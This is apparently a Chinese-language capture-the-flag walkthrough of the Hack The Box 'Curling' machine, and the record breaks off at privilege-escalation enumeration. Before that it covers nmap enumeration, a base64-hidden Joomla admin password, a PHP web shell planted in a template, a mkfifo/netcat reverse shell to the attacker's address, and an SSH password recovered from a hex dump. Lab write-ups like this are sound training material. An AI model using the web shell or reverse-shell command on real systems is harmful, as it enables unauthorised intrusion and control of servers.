Skip to content

Hack The Box - Curling


SYNOPSIS

Curling 是一个简单难度的 Linux 机器,需要大量枚举。密码保存在 Web 根目录的文件中。用户名可以通过允许登录的 CMS 上的帖子枚举。修改php模板反弹 shell。找到一个十六进制转储并解压它会提供一个用户密码。在枚举正在运行的进程时,会发现一个可用于root 的 cron。

Skills Ruquired

Enumeration

Skills Learned

Analyzing hex dump Curl usage


Enumeration

Port Scan

$ masscan -p1-65535 --rate=1000 -e tun0 $target
Discovered open port 22/tcp on 10.129.105.207                                  
Discovered open port 80/tcp on 10.129.105.207 

$ nmap -sC -sV -p22,80 -v $target
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap script

$ nmap -p 80 --script safe $target -v $target
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-10 12:21 BST
NSE: Loaded 346 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:21
NSE: [mtrace] not running for lack of privileges.
NSE: [broadcast-pppoe-discover] not running for lack of privileges.
NSE: [broadcast-ataoe-discover] No interface supplied, use -e
NSE: [url-snarf] not running for lack of privileges.
NSE: [broadcast-eigrp-discovery] not running for lack of privileges.
NSE: [broadcast-igmp-discovery] not running due to lack of privileges.
NSE: [broadcast-pim-discovery] not running for lack of privileges.
NSE: [shodan-api] Error: Please specify your ShodanAPI key with the shodan-api.apikey argument
NSE: [mrinfo] not running for lack of privileges.
NSE: [llmnr-resolve] not running due to lack of privileges.
NSE: [knx-gateway-discover] Not running due to lack of privileges.
NSE: not running for lack of privileges.
NSE: [broadcast-dhcp6-discover] not running for lack of privileges.
NSE: [lltd-discovery] not running for lack of privileges.
NSE: [broadcast-sonicwall-discover] Not running for lack of privileges.
NSE: [broadcast-dhcp-discover] not running for lack of privileges.
NSE: [targets-xml] Need to supply a file name with the targets-xml.iX argument
NSE: [broadcast-ping] not running for lack of privileges.
NSE: [broadcast-listener] not running for lack of privileges.
Completed NSE at 12:22, 40.02s elapsed
Initiating NSE at 12:22
Completed NSE at 12:22, 0.00s elapsed
Pre-scan script results:
|_broadcast-wpad-discover: Failed to retrieve wpad.dat (http://wpad.com/wpad.dat) from server
| targets-asn: 
|_  targets-asn.asn is a mandatory parameter
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
Initiating Ping Scan at 12:22
Scanning 2 hosts [2 ports/host]
Completed Ping Scan at 12:22, 0.02s elapsed (2 total hosts)
Initiating Parallel DNS resolution of 2 hosts. at 12:22
Completed Parallel DNS resolution of 2 hosts. at 12:22, 0.01s elapsed
Initiating Connect Scan at 12:22
Scanning 2 hosts [1 port/host]
Discovered open port 80/tcp on 10.129.105.207
Discovered open port 80/tcp on 10.129.105.207
Completed Connect Scan at 12:22, 0.00s elapsed (2 total ports)
NSE: Script scanning 2 hosts.
Initiating NSE at 12:22
NSE: [path-mtu] not running for lack of privileges.
NSE: [ipidseq] not running for lack of privileges.
NSE: [firewalk] not running for lack of privileges.
NSE: [qscan] not running for lack of privileges.
NSE: [tls-ticketbleed] Not running due to lack of privileges.
Completed NSE at 12:22, 22.59s elapsed
Initiating NSE at 12:22
Completed NSE at 12:22, 0.00s elapsed
Nmap scan report for 10.129.105.207
Host is up (0.015s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-backup-finder: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.1
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.~1~
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.1
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.~1~
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.1
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.~1~
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.1
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.~1~
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.1
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.~1~
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.1
|_  http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.~1~
|_http-fetch: Please enter the complete path of the directory to save data in.
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
|_http-xssed: No previously reported XSS vuln.
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 250
| http-traceroute: 
|_  Possible reverse proxy detected.
|_http-referer-checker: Couldn't find any cross-domain scripts.
| http-grep: 
|   (1) http://10.129.105.207:80/: 
|     (1) ip: 
|_      + 10.129.105.207
| http-headers: 
|   Date: Mon, 10 Oct 2022 11:22:19 GMT
|   Server: Apache/2.4.29 (Ubuntu)
|   Set-Cookie: c0548020854924e0aecd05ed9f5b672b=hc0lipau9p6ra5ne1u0i75f8r8; path=/; HttpOnly
|   Expires: Wed, 17 Aug 2005 00:00:00 GMT
|   Last-Modified: Mon, 10 Oct 2022 11:22:19 GMT
|   Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|   Pragma: no-cache
|   Connection: close
|   Content-Type: text/html; charset=utf-8
|   
|_  (Request type: HEAD)
|_http-mobileversion-checker: No mobile version detected.
| http-auth-finder: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
|   url                                                                                method
|   http://10.129.105.207:80/                                                          FORM
|   http://10.129.105.207:80/index.php/component/users/?view=reset&Itemid=101      FORM
|   http://10.129.105.207:80/index.php/2-uncategorised/1-first-post-of-curling2018     FORM
|   http://10.129.105.207:80/index.php                                                 FORM
|   http://10.129.105.207:80/index.php/2-uncategorised/2-curling-you-know-its-true     FORM
|   http://10.129.105.207:80/index.php/component/users/?view=remind&Itemid=101     FORM
|_  http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling  FORM
|_http-title: Home
| http-comments-displayer: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
|     
|     Path: http://10.129.105.207:80/media/jui/js/bootstrap.min.js?b6bf078482bc6a711b54fa9e74e19603
|     Line number: 1
|     Comment: 
|         /*!
|          * Bootstrap.js by @fat & @mdo
|          * Copyright 2012 Twitter, Inc.
|          * http://www.apache.org/licenses/LICENSE-2.0.txt
|          *
|          * Custom version for Joomla!
|          */
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 213
|     Comment: 
|         <!-- End Right Sidebar -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 161
|     Comment: 
|         <!-- Begin Right Sidebar -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 42
|     Comment: 
|         <!-- Header -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 39
|     Comment: 
|         <!-- Body -->
|     
|     Path: http://10.129.105.207:80/templates/protostar/js/template.js?b6bf078482bc6a711b54fa9e74e19603
|     Line number: 1
|     Comment: 
|         /**
|          * @package     Joomla.Site
|          * @subpackage  Templates.protostar
|          * @copyright   Copyright (C) 2005 - 2018 Open Source Matters, Inc. All rights reserved.
|          * @license     GNU General Public License version 2 or later; see LICENSE.txt
|          * @since       3.2
|          */
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 27
|     Comment: 
|         <!--[if lt IE 9]><script src="/media/jui/js/html5.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
|     
|     Path: http://10.129.105.207:80/media/jui/js/html5.js?b6bf078482bc6a711b54fa9e74e19603
|     Line number: 1
|     Comment: 
|         /**
|         * @preserve HTML5 Shiv 3.7.3 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed
|         */
|     
|     Path: http://10.129.105.207:80/index.php?format=feed&amp;type=rss
|     Line number: 2
|     Comment: 
|         <!-- generator="Joomla! - Open Source Content Management" -->
|     
|     Path: http://10.129.105.207:80/media/system/js/caption.js?b6bf078482bc6a711b54fa9e74e19603
|     Line number: 1
|     Comment: 
|         /*
|                 GNU General Public License version 2 or later; see LICENSE.txt
|         */
|     
|     Path: http://10.129.105.207:80/index.php/component/users/?view=remind&amp;Itemid=101
|     Line number: 29
|     Comment: 
|         <!--[if lt IE 9]><script src="/media/system/js/html5fallback.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 233
|     Comment: 
|         <!-- secret.txt -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 218
|     Comment: 
|         <!-- Footer -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 55
|     Comment: 
|         <!-- Begin Content -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 158
|     Comment: 
|         <!-- End Content -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 29
|     Comment: 
|_        <!--[if lt IE 9]><script src="/media/system/js/polyfill.event.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
| http-security-headers: 
|   Cache_Control: 
|     Header: Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|   Pragma: 
|     Header: Pragma: no-cache
|   Expires: 
|_    Header: Expires: Wed, 17 Aug 2005 00:00:00 GMT
|_http-date: Mon, 10 Oct 2022 11:22:18 GMT; +1h00m01s from local time.
|_http-malware-host: Host appears to be clean
| http-useragent-tester: 
|   Status for browser useragent: 200
|   Allowed User Agents: 
|     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
|     libwww
|     lwp-trivial
|     libcurl-agent/1.0
|     PHP/
|     Python-urllib/2.5
|     GT::WWW
|     Snoopy
|     MFC_Tear_Sample
|     HTTP::Lite
|     PHPCrawl
|     URI::Fetch
|     Zend_Http_Client
|     http client
|     PECL::HTTP
|     Wget/1.13.4 (linux-gnu)
|_    WWW-Mechanize/1.34
|_http-generator: Joomla! - Open Source Content Management

Host script results:
| unusual-port: 
|_  WARNING: this script depends on Nmap's service/version detection (-sV)
| port-states: 
|   tcp: 
|_    open: 80
| dns-blacklist: 
|   SPAM
|     list.quorum.to - FAIL
|_    l2.apews.org - FAIL
|_clock-skew: 1h00m00s
|_fcrdns: FAIL (No PTR record)

Nmap scan report for 10.129.105.207
Host is up (0.012s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-backup-finder: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.1
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.~1~
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.1
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.~1~
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.1
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.~1~
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.1
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.~1~
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.1
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.~1~
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.1
|_  http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.~1~
|_http-date: Mon, 10 Oct 2022 11:22:19 GMT; +1h00m00s from local time.
|_http-title: Home
|_http-xssed: No previously reported XSS vuln.
| http-security-headers: 
|   Cache_Control: 
|     Header: Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|   Pragma: 
|     Header: Pragma: no-cache
|   Expires: 
|_    Header: Expires: Wed, 17 Aug 2005 00:00:00 GMT
|_http-fetch: Please enter the complete path of the directory to save data in.
|_http-malware-host: Host appears to be clean
| http-comments-displayer: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
|     
|     Path: http://10.129.105.207:80/media/jui/js/bootstrap.min.js?b6bf078482bc6a711b54fa9e74e19603
|     Line number: 1
|     Comment: 
|         /*!
|          * Bootstrap.js by @fat & @mdo
|          * Copyright 2012 Twitter, Inc.
|          * http://www.apache.org/licenses/LICENSE-2.0.txt
|          *
|          * Custom version for Joomla!
|          */
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 213
|     Comment: 
|         <!-- End Right Sidebar -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 161
|     Comment: 
|         <!-- Begin Right Sidebar -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 42
|     Comment: 
|         <!-- Header -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 39
|     Comment: 
|         <!-- Body -->
|     
|     Path: http://10.129.105.207:80/templates/protostar/js/template.js?b6bf078482bc6a711b54fa9e74e19603
|     Line number: 1
|     Comment: 
|         /**
|          * @package     Joomla.Site
|          * @subpackage  Templates.protostar
|          * @copyright   Copyright (C) 2005 - 2018 Open Source Matters, Inc. All rights reserved.
|          * @license     GNU General Public License version 2 or later; see LICENSE.txt
|          * @since       3.2
|          */
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 27
|     Comment: 
|         <!--[if lt IE 9]><script src="/media/jui/js/html5.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
|     
|     Path: http://10.129.105.207:80/media/jui/js/html5.js?b6bf078482bc6a711b54fa9e74e19603
|     Line number: 1
|     Comment: 
|         /**
|         * @preserve HTML5 Shiv 3.7.3 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed
|         */
|     
|     Path: http://10.129.105.207:80/index.php?format=feed&amp;type=rss
|     Line number: 2
|     Comment: 
|         <!-- generator="Joomla! - Open Source Content Management" -->
|     
|     Path: http://10.129.105.207:80/media/system/js/caption.js?b6bf078482bc6a711b54fa9e74e19603
|     Line number: 1
|     Comment: 
|         /*
|                 GNU General Public License version 2 or later; see LICENSE.txt
|         */
|     
|     Path: http://10.129.105.207:80/index.php/component/users/?view=remind&amp;Itemid=101
|     Line number: 29
|     Comment: 
|         <!--[if lt IE 9]><script src="/media/system/js/html5fallback.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 233
|     Comment: 
|         <!-- secret.txt -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 218
|     Comment: 
|         <!-- Footer -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 55
|     Comment: 
|         <!-- Begin Content -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 158
|     Comment: 
|         <!-- End Content -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 29
|     Comment: 
|_        <!--[if lt IE 9]><script src="/media/system/js/polyfill.event.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
|_http-mobileversion-checker: No mobile version detected.
| http-useragent-tester: 
|   Status for browser useragent: 200
|   Allowed User Agents: 
|     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
|     libwww
|     lwp-trivial
|     libcurl-agent/1.0
|     PHP/
|     Python-urllib/2.5
|     GT::WWW
|     Snoopy
|     MFC_Tear_Sample
|     HTTP::Lite
|     PHPCrawl
|     URI::Fetch
|     Zend_Http_Client
|     http client
|     PECL::HTTP
|     Wget/1.13.4 (linux-gnu)
|_    WWW-Mechanize/1.34
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-traceroute: 
|_  Possible reverse proxy detected.
|_http-referer-checker: Couldn't find any cross-domain scripts.
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
| http-headers: 
|   Date: Mon, 10 Oct 2022 11:22:21 GMT
|   Server: Apache/2.4.29 (Ubuntu)
|   Set-Cookie: c0548020854924e0aecd05ed9f5b672b=i83sbh62st9mlm2095fgb0rmgq; path=/; HttpOnly
|   Expires: Wed, 17 Aug 2005 00:00:00 GMT
|   Last-Modified: Mon, 10 Oct 2022 11:22:21 GMT
|   Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|   Pragma: no-cache
|   Connection: close
|   Content-Type: text/html; charset=utf-8
|   
|_  (Request type: HEAD)
| http-auth-finder: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
|   url                                                                                method
|   http://10.129.105.207:80/                                                          FORM
|   http://10.129.105.207:80/index.php/component/users/?view=reset&amp;Itemid=101      FORM
|   http://10.129.105.207:80/index.php/2-uncategorised/1-first-post-of-curling2018     FORM
|   http://10.129.105.207:80/index.php                                                 FORM
|   http://10.129.105.207:80/index.php/2-uncategorised/2-curling-you-know-its-true     FORM
|   http://10.129.105.207:80/index.php/component/users/?view=remind&amp;Itemid=101     FORM
|_  http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling  FORM
| http-grep: 
|   (1) http://10.129.105.207:80/: 
|     (1) ip: 
|_      + 10.129.105.207
|_http-generator: Joomla! - Open Source Content Management
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 250

Host script results:
|_clock-skew: 59m59s
| unusual-port: 
|_  WARNING: this script depends on Nmap's service/version detection (-sV)
|_fcrdns: FAIL (No PTR record)
| port-states: 
|   tcp: 
|_    open: 80
| dns-blacklist: 
|   SPAM
|     list.quorum.to - FAIL
|_    l2.apews.org - FAIL

NSE: Script Post-scanning.
Initiating NSE at 12:22
Completed NSE at 12:22, 0.00s elapsed
Initiating NSE at 12:22
Completed NSE at 12:22, 0.00s elapsed
Post-scan script results:
| reverse-index: 
|_  80/tcp: 10.129.105.207, 10.129.105.207
Read data files from: /usr/bin/../share/nmap
Nmap done: 2 IP addresses (2 hosts up) scanned in 63.92 seconds

$ searchsploit Apache 2.4.29
<SNIP>
pache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)                                    | multiple/webapps/50383.sh

发现主页 html 源码 secret.txt 注释,访问查看

view-source:http://10.129.106.27/

![[Pasted image 20221012193728.png]]

$ curl -s http://$target/secret.txt | base64 -d
Curling2018!

前往 http://10.129.106.27/administrator 目录下使用用户 Floris 密码 Curling2018! 登陆


Foothold(立足点)

Web

Joomla CMS 托管的冰壶网站: 帖子由 Super User 编写,其中一篇署名 Floris 首页HTML源码中含有一条注释

<SNIP>
</body>
    <!-- secret.txt -->
</html>

访问可获取一段base64加密字段,经过 base64 解密后取得网站后台密码

$echo 'Q3VybGluZzIwMTgh' | base64 -d
Curling2018!

搜索 Joomla CMS 相关信息可以得知管理面板路径为/administrator,以 floris 身份成功登陆

获取 www-data shell

寻找写入 php 代码的地方 转到 Extensions -> Templates

新建或寻找 php 文件,写入 php shell,保存。

<?php system($_REQUEST['pwn']); ?>

访问该页面测试 shell,获取反向 shell http://10.129.106.116/templates/beez3/dark.php?pwn=id

![[Curling_www-data.png]]

$ curl http://10.129.106.116/templates/beez3/dark.php -G --data-urlencode 'pwn=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f '

$ rlwrap nc -lvp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.129.106.116.
Ncat: Connection from 10.129.106.116:42390.
/bin/sh: 0: can not access tty; job control turned off
whoami
www-data

$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@curling:/var/www/html/templates/beez3$ ll


LATERAL MOVEMENT(横向移动)

HEX DUMP

Navigating(导航) /home/floris 文件夹下找到 password_backup

$ cat password_backup
00000000: 425a 6839 3141 5926 5359 819b bb48 0000  BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34  ....A...P)ava.:4
<SNIP>

$ cp password_backup /tmp && cat /tmp/password_backup | xxd -r > /tmp/bak

$ file bak
bak: bzip2 compressed data, block size = 900k

多次压缩文件,解压方式:

$ bzip2 -d bak
bzip2: Can not guess original name for bak -- using bak.out
$ file bak.out
bak.out: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix

$ mv bak.out bak.gz

$ gzip -d bak.gz

$ file bak
ak: bzip2 compressed data, block size = 900k

$ bzip2 -d bak
bzip2: Can not guess original name for bak -- using bak.out

$ file bak.out
ak.out: POSIX tar archive (GNU)

$ tar xf bak.out

$ cat password.txt
5d<wdCbdZu)|hChXll    #floris SSH 密码
$ ssh floris@10.129.106.116
Last login: Wed Sep  8 11:42:07 2021 from 10.10.14.15
floris@curling:~$ whoami
floris

Privilege Escalation

Enumeration

使用工具 pspy 下载较小的二进制文件并将其传输到盒子中

$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.0.0/pspy64s

$ scp pspy64s floris@10.129.106.116:/tmp
$ cd /tmp
$ chmod +x pspy64s
./pspy64s
/bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report 
